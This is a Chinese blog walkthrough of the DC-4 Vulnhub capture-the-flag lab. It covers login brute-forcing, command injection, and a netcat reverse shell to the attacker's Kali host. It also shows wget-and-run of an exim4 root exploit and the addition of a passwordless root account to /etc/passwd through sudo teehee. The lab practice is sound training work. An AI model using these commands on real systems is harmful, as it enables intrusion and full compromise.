DC-4靶场实战详解

最新推荐文章于 2024-04-11 08:10:22 发布
最新推荐文章于 2024-04-11 08:10:22 发布
阅读量3.2k 收藏 8
点赞数 7
分类专栏: DC 文章标签: 安全 linux web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/a310034188/article/details/123192398
版权

DC-4靶场实战详解

环境安装

DC-4下载地址:https://www.vulnhub.com/entry/dc-4,313/

kali 与 DC-4 网络配置设为一致,我这里都是用nat模式

image-20220126111501966

寻找FLAG

信息收集

1.寻找靶机ip

我的kali ip为192.168.79.128

不知道kali ip的可以直接ip add 查看

在kali中使用nmap或者使用arp-scan

方法一:
	arp-scan -l
方法二:
    nmap -sP 192.168.79.0/24

image-20220128165038090

image-20220128165055903

确认靶机ip为 192.168.79.132

  1. 探测靶机开启的服务

使用nmap 进行服务探测

nmap -v -A 192.168.79.132

image-20220128165306150

image-20220128165351412

可以看到 开启了 80与22端口

3.访问开启的服务

访问 192.168.79.132

image-20220128165510756

随便用 Wappalyzer查看下是不是常用的cms 发现就是简单的用一个登录框,一个不是什么cms

4.目录爆破

image-20220128170804127

发现都给重定向到index.php

看来给的网站需要我们登录.

爆破登录

不太确定有没有sql注入点 直接用burpsuite跑万能密码就知道了

先抓包

image-20220128171110359

看到没有前端加密也没有验证码和token,那就直接跑字典就好了

发到攻击载荷用集束炸弹

image-20220128171321240

添加个sql注入试试

image-20220128171355945

image-20220128171414573

账号密码都加 反正也才1w+ 一下子就跑完了

image-20220128171513897

跑完发现回包都是一样的 基本可以确定 没办法sql注入。

尝试直接账号密码爆破这类默认账号一般是admin 可以尝试下

image-20220128173340665

密码使用burpsuite默认密码集试试

image-20220128173412375

image-20220128173502189

按长度来排序 发现happy 长度不一样 查看回包

image-20220128173546269

基本可以判断就是这个账号密码了测试登录

image-20220128173631870

image-20220128173641884

image-20220128173701712

点RUN 发现好像是命令执行了 ls -l 抓包看看

image-20220128173806783

果然 是通过关键字 radio 提交命令的 我们加个ip add命令试试

记得空格要加+号!!

ip add  		#ip+add

image-20220128174119215

image-20220128174137742

发现返回了信息,那下一步就是利用这个漏洞反弹shell了

反弹shell

尝试用nc看看可不可以反弹

kali上先开启侦听8080端口

nc -lvvp 8080

image-20220128175016332

修改命令执行的命令!

nc 192.168.79.128 8080 -e /bin/bash 
#	nc+192.168.79.128+8080+-e+/bin/bash 
#	空格+号代替

image-20220128174909538

image-20220128175051052

可以看到kali中获得了shell

使用python获得交互式界面

python -c "import pty;pty.spawn('/bin/bash')"

image-20220128175203188

提权

不知道是这题的问题还是什么问题因为我以前做过DC-8,所以DC-4发现了2个提权点。

一个就是DC-8里面用到的exim4提权

另一个是

exim4提权

先看看当前权限

image-20220128175804166

不是root权限

都先看看具有SUID权限的命令

find / -user root -perm -4000 -print 2>/dev/null

发现一个exim4

image-20220128175944119

查看查看exim4版本

exim4 --version		#查看exim4的版本

image-20220128180306190

我的天哪!又是4.89 和DC-8的一样 又是和DC-8一样的套路

先看看本地漏洞库

searchsploit exim 4

image-20220128190518587

46996符合exim 4.89 就用这个 拷贝到kali的apache web页面下

systemctl start apache2.service  									#开启apache
cp /usr/share/exploitdb/exploits/linux/local/46996.sh /var/www/html #拷贝到kali的apache web页面下

image-20220128190739436

访问kali web页面 复制payload下载地址

http://192.168.79.128/46996.sh

DC-4下载payload

wget http://192.168.79.128/46996.sh

image-20220128191325664

显示拒绝访问,看来是这个目录权限不够,我们移到/tmp里面

cd /tmp
wget http://192.168.79.128/46996.sh

image-20220128191446540

下载成功,给执行权限,并且运行。

chmod +x 46996.sh
./46996.sh

image-20220128191554818

image-20220128191635897

image-20220128191623006

成功获得root权限

执行exp报错

如果这里执行exp报错

执行脚本的时候提示 “/bin/bash^M: bad interpreter: No such file or directory” 的错误是由于脚本文件是 dos 格式,即每一行结尾以 \r\n 来标识,而 unix 格式的文件结尾以 \n 来标识

查看脚本文件是dos格式还是unix格式的几种办法。
cat -A filename  从显示结果可以判断,dos格式的文件行尾为^M$,unix格式的文件行尾为$。
od -t x1 filename 如果看到输出内容中存在0d 0a的字符,那么文件是dos格式,如果只有0a,则是unix格式。
vi filename    打开文件,执行 : set ff,如果文件为dos格式在显示为fileformat=dos,如果是unxi则显示为fileformat=unix。

解决方法:
使用linux命令dos2unix filename,直接把文件转换为unix格式
使用sed命令sed -i "s/\r//" filename  或者 sed -i "s/^M//" filename直接替换结尾符为unix格式
vi filename打开文件,执行 : set ff=unix 设置文件为unix,然后执行:wq,保存成unix格式。


————————————————
原文链接:https://blog.csdn.net/LZHPIG/article/details/104594330
teehee提权

我感觉这才是这个DC-4的正确解法

一样通过nc进入靶机,查看系统里面有什么文件

image-20220228203358608

慢慢查找发现有一个文件jim可以直接进去 然后里面有一些奇怪的文件 一个一个慢慢看

image-20220228203511579

发现了一大堆密码类似的东西,应该是给我们的提示 让我们爆破jim

把文件保存下来,爆破我们使用hydra

hydra -l jim -P mmmm.txt 192.168.79.132 ssh

image-20220228204527160

可以得到ssh账号密码为:jim jibril04

使用kali登录jim

ssh jim@192.168.79.132

image-20220228204748297

接下来还是一顿搜索 发现jim有邮件

image-20220228204916095

进入邮件目录

cd var/spool/mail

image-20220228205228400

image-20220228205308969

可以看到发件人的账号和密码

账号:Charles

密码:^xHhA&hvim0y

直接su 切换用户试试

su Charles   #发现不行 然后试了一下小写就没问题
账号:charles

密码:^xHhA&hvim0y

su charles  # 然后输入密码即可

image-20220228205638383

查看 使用sudo运行的命令

sudo -l

image-20220228210011064

看到一个teehee提权 那我们可以用teehee写一些信息到/etc/passwd里面

/etc/passwd 内每个字段含义

username:password:User ID:Group ID:comment:home directory:shell

echo "admin::0:0:::/bin/bash" | sudo teehee -a /etc/passwd
# 用户名admin 没有密码为管理员权限 进入的时候运行/bin/bash

image-20220228210326180

image-20220228210342419

可以看到我们获取到了root权限!!

FLAG

在root目录下

cd /root
cat flag.txt

image-20220128192145262

a310034188
关注
专栏目录
[网络安全自学篇] 六十六.Vulnhub靶机渗透之DC-1提权和Drupal漏洞利用(二)
杨秀璋的专栏
04-11 1万+
这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步。前文分享了Vulnhub靶机渗透的环境搭建和JIS-CTF题目,采用Nmap、Dirb、中国蚁剑、敏感文件分析、SSH远程连接、Shell提权等获取5个flag。本文将讲解DC-1提权和Drupal漏洞利用,通过信息收集、CMS漏洞搜索、Metasploit反弹shell、提权及数据库爆破获取flag。本文是一篇Web渗透的基础性文章,希望对您有所帮助。
[ 内网渗透实战篇-2 ] 父域子域架构的搭建与安装&域环境判断&域控定位&组策略&域森林架构配置&信任关系
最新发布
qq_51577576的博客
11-07 173
[ 内网渗透实战篇-2 ] 父域子域架构的搭建与安装&域环境判断&域控定位&组策略&域森林架构配置&信任关系 1、学习如何搭建父子域架构 2、了解域森林架构以及与单域、父子域的不同 3、掌握如何判断主机是否在单域内 4、掌握如何判断主机是否在父子域内 5、掌握如何定位当前域控DC 6、掌握如何获取当前其他信息 其他信息:用户及组,网络架构等、手工工具:常见命令,工具插件等、角色信息
/bin/bash^M: bad interpreter: 没有那个文件或目录
热门推荐
yongan1006的专栏
11-02 6万+
运行脚本时出现了这样一个错误,打开之后并没有找到所谓的^M,查了之后才知道原来是文件格式的问题,也就是linux和windows之间的不完全兼容。。。 具体细节不管,如果验证: vim test.sh :set ff? 如果出现fileforma=dos那么就基本可以确定是这个问题了。 :set fileformat=unix :wq OK了。。。。。。。
/bin/bash^M: bad interpreter: No such file or dire
风轻云淡
05-23 1384
在执行shell脚本时提示这样的错误主要是由于shell脚本文件是dos格式,即每一行结尾以\r\n来标识,而unix格式的文件行尾则以\n来标识。   查看脚本文件是dos格式还是unix格式的几种办法。 (1)cat -A filename  从显示结果可以判断,dos格式的文件行尾为^M$,unix格式的文件行尾为$。 (2)od -t x1 filename 如果看到输出内容中存在0
linux window文件格式转linux文件格式
loyaltylzr的专栏
12-28 1445
(1)使用linux命令dos2unix filename,直接把文件转换为unix格式; (2)使用sed命令sed -i "s/\r//" filename 或者 sed -i "s/^M//" filename直接替换结尾符为unix格式; (3)vi filename打开文件,执行 : set ff=unix 设置文件为unix,然后执行:wq,保存成unix格式。 查看脚本文件是dos...
bin/bash^M: 坏的解释器: 没有那个文件或目录
左耳的专栏
03-30 2455
编写shell脚本时,我们经常习惯在windows下写好,然后通过共享目录拷到linux下,方便快捷。 杯具的事也来了,当我们在windows写一个shell程序拷到linux中,修改好权限,正准备试下效果时, /bin/bash^M: 坏的解释器: 没有那个文件或目录 坏的解释器: 没有那个文件或目录" name="image_operate_16911363012473286" alt=
Linux中执行bash脚本报错/bin/bash^M: bad interpreter: No such file or directory
无解
04-11 311
linux 编写脚本的时候,将本地的文件放到服务器上时,执行sh 文件时报错:No such file or directory。使用下述命令看看该文件的格式,dos格式的文件行尾为^M$,unix格式的文件行尾为$再次执行 ./xxx.sh 可以执行成功。替换结尾符为unix格式。
Vulnhub系列之DC5靶场详解
weixin_50053818的博客
05-13 1788
文章目录环境文件包含突破点screen提权 环境 vulhub系列之DC5靶场 VMware虚拟机 kali 文件包含突破点 根据目标靶机MAC地址得到靶机IP为192.168.43.160,直接上nmap扫描。 发现开放了80、111、36936端口,暂时只知道端口80是web站点,另外两个端口未知。其他无头绪,直接访问网页。 进入网页,一堆的英文,看了一下内容发现没有什么用,只有Contact页面有几个输入点,经过SQL注入和XSS测试,没有发现相关漏洞。 卡了半天没有找到什么突破点了,所以尝试
vulnhub靶场渗透练习详解——DC9
weixin_51011609的博客
08-19 2118
vulnhub靶场渗透练习详解——DC9
ATT&CK红队评估(红日靶场五)
weixin_45682839的博客
04-30 1725
ATT&CK红队评估(红日靶场五)通关攻略,涉及知识包括:ThinkPHP5.0 RCE漏洞、内网渗透、横向移动、psexec使用、代理建立,matespolit、cobaltstrike等工具使用。
解决Linux Shell脚本错误:“/bin/bash^M: bad interpreter: No such file or directory”
提笔忘字的帝国
02-02 9221
这个错误通常是由于Shell脚本文件中存在不兼容的换行符引起的。在Windows系统中,文本文件的行尾通常以回车符(CR)和换行符(LF)的组合表示(称为CRLF),而在Linux和Unix系统中,行尾仅以换行符(LF)表示。当你在Windows环境下编写或编辑Shell脚本,然后尝试在Linux系统上运行时,就可能会遇到这个问题。
/bin/bash^M: 坏的解释器: 没有那个文件或目录
weixin_34191734的博客
08-29 147
Linux下编译cocos2d-x运行脚本的时候出现”/bin/bash^M: 坏的解释器: 没有那个文件或目录“这样的错误如下图。 解决方法:     使用在终端输入sed -i 's/\r$//' make-all-linux-project.sh即可     其中make-all-linux-project.sh为我的文件名,这里改成自己需要的即可 原因:     这个文件...
Shell错误:/bin/bash^M: bad interpreter: No such file or directory
缘来阁
07-27 1万+
错误原因和现象 在执行shell脚本的时候,报错:/bin/bash^M: bad interpreter: No such file or directory。 是由于该脚本文件是在Windows平台编写,然后在MacOS平台中执行。 在Windows平台上文件是dos格式,换行符尾\r\n,而MacOS平台文件是unix格式,换行符尾\n。因此在运行脚本文件时,不能正确解析\r,导致编译错误、运行失败。 解决方案 在MacOS平台上,打开命令行工具执行命令vim *.sh(编辑你的脚本文件),然.
脚本执行报错/bin/bash^M: bad interpreter: No such file or directory
gm371200587的博客
09-12 7950
sheff脚本执行报错/bin/bash^M: bad interpreter: No such file or directory 解决方法:因为脚本在windows下创建编辑然后上传到linux系统的,所以是dos格式的,而linux却是只能执行格式为unix格式的脚本。所以识别不了,检查一下是否是dos格式: vi编辑模式下,输入 :set ff 然后回车 回车后: 确定...
Linux报错:/bin/bash^M: bad interpreter: No such file or directory
lk的博客
05-19 317
1.错误原因: shell脚本文件是dos格式, 在windows下每一行结尾以\r\n来标识,而unix格式的文件行尾则以\n来标识。 2.查看脚本文件是dos格式或者unix格式: 方法一 cat -A filename 从显示结果可以判断,dos格式的文件行尾为^M$,unix格式的文件行尾为$。 方法二 vi filename打开文件,命令模式下执行 : set ff,如果文件为dos格式在显示为fileformat=dos,如果是unxi则显示为fileformat=unix。 3.解决方法
解决Linux /bin/bash^M: bad interpreter: No such file or directory
Goodera
12-16 839
今天在执行shell脚本的时候遇到一个问题,直入主题: 首先我用Nodepad++编写一个简单的shell脚本(测试用): hk.sh #!/bin/bash echo 'hello Kitty' 然后上传到Linux运行: 没有执行权限,先修改权限: [root@cdh001 ~]# chmod 750 hk.sh 执行: [root@cdh001 ~]# ./hk.sh -bash: ...
CentOS6 Shell脚本/bin/bash^M: bad interpreter错误解决方法
weixin_33813128的博客
04-26 203
为什么80%的码农都做不了架构师?>>> ...
shell脚本执行报错:/bin/bash^M: bad interpreter: No such file or directory
weixin_39309402的博客
08-19 2万+
shell脚本报错/bin/bash^M: bad interpreter: No such file or directory,通过查阅资料得知,shell脚本格式必须是unix才行,但我这个脚本是在windows上编写完成传到Linux服务器上的,所以一执行就报错: windows环境下的文件是dos格式,即每行结尾以\r\n来标识,而linux下的文件是unix格式,行尾则以\n来标识...
linux /bin/bash^M: bad interpreter: No such file or directory
一种感觉的博客
01-28 423
在 Windows 环境中创建脚本然后移植到 Unix 环境中运行时,会出现这个报错。 Unix 使用不同的行尾,因此无法读取在 Windows 上创建的文件。因此它将 ^M 视为非法字符。 如果想在 Windows 上编写文件然后移植过来,请确保的编辑器设置为以 UNIX 格式创建文件。 在屏幕右下角的 notepad++ 中,可以看到文档格式。默认情况下,Dos\Windows. 要更改它,请转到 1. 设置->首选项 2. 新文档/默认目录选项卡 3. 创建一个新文档 ...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值